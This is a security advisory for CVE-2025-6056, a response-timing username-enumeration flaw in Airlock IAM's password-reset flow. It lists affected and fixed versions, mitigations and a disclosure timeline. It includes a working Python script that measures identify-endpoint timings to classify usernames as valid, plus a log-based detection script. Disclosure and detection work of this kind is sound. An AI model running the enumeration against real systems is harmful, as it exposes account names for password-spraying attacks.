Security Advisory for Airlock IAM: Username Enumeration via Response Timing in the Password Reset Functionality

Jul 4, 2025 by Patrick Schlüter

During a penetration test of a client’s application built on Airlock IAM, an identity and access management (IAM) solution developed by Ergon Informatik AG, the IAM was found to be vulnerable to a timing attack in the self-service password reset feature. Redguard initially reported the vulnerability to the client, who disclosed it to the vendor and then asked Redguard to conduct a responsible disclosure process with the vendor. As a result of this process, the vendor fixed the vulnerability in all currently supported versions of Airlock IAM, and Redguard’s security testers verified the fix.

Security Advisory for CVE-2025-6056

A timing difference in the self-service password reset feature allows an attacker to determine whether a username is valid by submitting it to the password reset flow and observing the server’s response time. The vulnerability was assigned a CVSS v4.0 score of 6.9 (Medium) and the identifier CVE-2025-6056.

Technical Details

Airlock IAM allows customers to configure custom password reset flows, so the exact steps may differ from one installation to another. An example password reset flow can be found in the Airlock IAM documentation; the tested client’s application used a similar flow. As in the documented example, the user is first prompted to enter their username, which is sent to the server with the following HTTP request (USERNAME is replaced with the actual username):

POST /auth/rest/public/self-service/username/identify HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/plain, */*
[...]
Content-Type: application/json
[...]

{"username":"USERNAME"}

To prevent username enumeration, the response body to this request always indicates success, even for invalid usernames. However, the server’s response time differed significantly depending on whether the submitted username was valid. For invalid usernames (no user with that name exists), the response time was around 30 to 40 milliseconds; for valid usernames it was around 500 to 800 milliseconds. A difference of more than an order of magnitude is far larger than ordinary network jitter, so a handful of samples per candidate is enough to classify it reliably. This timing discrepancy allows an attacker to determine whether a given username is registered in the IAM.

If no additional anti-automation measures such as CAPTCHAs are in place, attackers can run automated username guessing against the password reset form, build a list of valid usernames, and use that list in follow-up attacks such as password spraying.
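The following script is an added example written for this page; it is not Redguard’s test tooling nor Airlock code. It shows how the timing difference described above is measured and turned into a valid/invalid verdict: each candidate is requested several times, candidates are interleaved so latency drift hits all of them equally, and medians are compared against a baseline obtained from a username that certainly does not exist. The endpoint path is the one from the request above; the base URL, the candidate usernames, and the throwaway local server in the demo (which simulates the observed 30 ms versus 500 ms behaviour with constructed delays) are assumptions for the offline demonstration.

```python
"""Measure and classify response timing of a password-reset 'identify' endpoint.
Example code for this page (not Redguard's or Airlock's). URL, usernames and
the demo server's delays are constructed."""
import json
import statistics
import time
import urllib.request

IDENTIFY_PATH = "/auth/rest/public/self-service/username/identify"
HEADERS = {"Content-Type": "application/json", "Accept": "application/json"}


def time_identify(base_url, username, timeout=10):
    """POST one identify request and return the response time in ms.
    The body always reports success, so only the timing is recorded."""
    req = urllib.request.Request(
        base_url.rstrip("/") + IDENTIFY_PATH,
        data=json.dumps({"username": username}).encode(),
        headers=HEADERS,
        method="POST",
    )
    start = time.perf_counter()
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        resp.read()
    return (time.perf_counter() - start) * 1000


def measure_all(base_url, candidates, samples=5):
    """Collect `samples` timings per candidate, round-robin over candidates so
    that latency drift during the run affects all of them equally."""
    timings = {user: [] for user in candidates}
    for _ in range(samples):
        for user in candidates:
            timings[user].append(time_identify(base_url, user))
    return timings


def classify_usernames(timings, baseline, margin_ms=100.0):
    """Return {username: 'valid' | 'invalid'}.

    baseline: timings for a username guaranteed not to exist (e.g. a random
    string), measured in the same run. Medians are used so one slow request
    cannot flip a verdict; a candidate is 'valid' when its median exceeds the
    baseline median by at least margin_ms and by more than 3x the baseline's
    own spread."""
    base_med = statistics.median(baseline)
    spread = max(baseline) - min(baseline)
    threshold = base_med + max(margin_ms, 3 * spread)
    return {
        user: "valid" if statistics.median(ts) > threshold else "invalid"
        for user, ts in timings.items()
    }


def _demo():
    """Offline demo: a throwaway local server (constructed) that answers with an
    identical success body but sleeps longer for usernames that exist."""
    import threading
    import uuid
    from http.server import BaseHTTPRequestHandler, HTTPServer

    known_users = {"alice", "bob"}  # constructed user database

    class Handler(BaseHTTPRequestHandler):
        def do_POST(self):
            length = int(self.headers.get("Content-Length", 0))
            user = json.loads(self.rfile.read(length)).get("username")
            time.sleep(0.2 if user in known_users else 0.01)  # the side channel
            body = b'{"status":"ok"}'  # same body for every username
            self.send_response(200)
            self.send_header("Content-Type", "application/json")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

        def log_message(self, *args):  # keep the demo output quiet
            pass

    server = HTTPServer(("127.0.0.1", 0), Handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    base_url = f"http://127.0.0.1:{server.server_port}"

    probe = uuid.uuid4().hex  # certainly not a registered username
    timings = measure_all(base_url, ["alice", "mallory", "bob", probe])
    verdicts = classify_usernames(timings, baseline=timings.pop(probe))
    for user, verdict in verdicts.items():
        med = statistics.median(timings[user])
        print(f"{user:>8}: median {med:7.1f} ms -> {verdict}")
    server.shutdown()


if __name__ == "__main__":
    _demo()
```

Against a real target, replace the demo server with the IAM’s base URL and keep the baseline measurement in the same run as the candidates: the absolute times depend on network path and server load, and only the relative difference to a known-invalid username is meaningful.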

Affected versions

This vulnerability was found in Airlock IAM 8.2.0. According to the vendor, the following versions of Airlock IAM are also vulnerable:

  • 7.7.9
  • 8.0.8
  • 8.1.7
  • 8.2.4
  • 8.3.1

The security testers assume that earlier patch releases of the same minor versions (such as 8.1.0 to 8.1.6) are also vulnerable, but did not explicitly verify this.

Fixed versions

The fix is listed as bugfix AI-19865 in the IAM changelogs. According to vendor information, the following versions of Airlock IAM are fixed:

  • 7.7.11
  • 8.0.9
  • 8.1.8
  • 8.2.5
  • 8.3.2

Redguard verified the fix only on Airlock IAM 8.4.1, since the customer upgraded to that version; the other fixed versions were not explicitly tested.

Suggested Mitigations and Countermeasures

It is recommended to upgrade Airlock IAM to one of the fixed versions. Where this is not possible, automated exploitation can likely be made more difficult by enabling additional anti-automation measures such as a CAPTCHA on the password reset step in which users enter their username. Note that such measures raise the cost of enumeration but do not remove the timing difference itself.
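Since a CAPTCHA only slows enumeration down, a defender will also want to notice it happening. The script below is an added example for this page, not part of the advisory or of Airlock: it flags any client that sends more than a threshold of POST requests to the identify endpoint within a sliding one-minute window. The log format (Common Log Format), the sample lines, the client addresses and the threshold are constructed assumptions; a real deployment would map the regular expression to the web server’s or IAM’s actual log format. Because the username travels in the POST body and is normally not logged, the rule counts requests rather than distinct usernames, which is enough: a legitimate user submits the identify step once or twice, not a dozen times a minute.

```python
"""Sliding-window detection of password-reset username enumeration.
Example code for this page; log format, addresses and threshold are constructed."""
import re
from collections import defaultdict, deque
from datetime import datetime, timezone

IDENTIFY_PATH = "/auth/rest/public/self-service/username/identify"

# Common Log Format: ip ident user [timestamp] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)


def parse_line(line):
    """Return (ip, timestamp, method, path) or None for unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("method"), m.group("path")


def find_enumeration(lines, window_s=60, threshold=10):
    """Return {ip: timestamp_when_first_flagged} for clients that sent more
    than `threshold` identify requests inside any `window_s` window.
    Assumes lines arrive in chronological order; per-IP deques give O(n)."""
    recent = defaultdict(deque)
    flagged = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, method, path = parsed
        if method != "POST" or path != IDENTIFY_PATH:
            continue  # only the identify step is of interest
        window = recent[ip]
        window.append(ts)
        while (ts - window[0]).total_seconds() > window_s:
            window.popleft()  # drop requests older than the window
        if len(window) > threshold and ip not in flagged:
            flagged[ip] = ts
    return flagged


def _line(ip, second, path=IDENTIFY_PATH, method="POST"):
    """Build one constructed log line on 2025-07-04 10:15:<second> UTC."""
    ts = datetime(2025, 7, 4, 10, 15, second, tzinfo=timezone.utc)
    stamp = ts.strftime("%d/%b/%Y:%H:%M:%S %z")
    return f'{ip} - - [{stamp}] "{method} {path} HTTP/1.1" 200 15'


# Constructed sample: one ordinary user, one client hammering the identify
# step every three seconds, and an unrelated request that must be ignored.
SAMPLE_LOG = (
    [_line("198.51.100.2", 5)]
    + [_line("203.0.113.7", 3 * i) for i in range(12)]
    + [_line("203.0.113.7", 40, path="/", method="GET")]
)

if __name__ == "__main__":
    for ip, when in find_enumeration(SAMPLE_LOG).items():
        print(f"possible username enumeration from {ip} at {when.isoformat()}")
```

The threshold should be tuned to the observed baseline of the reset form; raising it trades earlier detection for fewer false positives from shared egress addresses such as corporate proxies.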

Credits

  • Patrick Schlüter, Redguard AG

Timeline

In the following timeline, the customer refers to the company that tasked Redguard with a penetration test of their application and the vendor refers to the Airlock team.

  • 2024-09-06: Redguard reported the vulnerability to the customer
  • 2024-10-10: Customer reported the vulnerability to the vendor
  • 2024-10-14: The vendor confirmed the existence of the vulnerability
  • 2024-12-03: Redguard contacted the vendor to check on the current status of the vulnerability
  • 2024-12-09: Redguard contacted the vendor again due to no response
  • 2025-01-06: The vendor requested additional information about the vulnerability
  • 2025-01-13: The vendor asked again due to not receiving a response
  • 2025-01-21: Redguard provided the case number they got from the customer
  • 2025-01-21: The vendor replied with current status of the vulnerability
  • 2025-02-19: The vendor released fixed versions of Airlock IAM
  • 2025-02-19: Redguard received permission from the customer to release an advisory once the vulnerability is fixed
  • 2025-06-05: Customer successfully updated to a fixed version of Airlock IAM
  • 2025-06-05: Redguard verified the fix on the customer’s application
  • 2025-06-12: Redguard contacted NCSC, the Swiss CNA, to request a CVE
  • 2025-06-13: Redguard received permission from the vendor to release an advisory
  • 2025-07-04: Public disclosure of this advisory

Disclaimer

This document is not meant to be a complete list of security issues for any of the mentioned software and/or versions. It is possible, and indeed likely, that there are further security issues that are yet to be identified. The information in the advisory is believed to be accurate at the time of publishing, based on currently available information.

Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties regarding this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
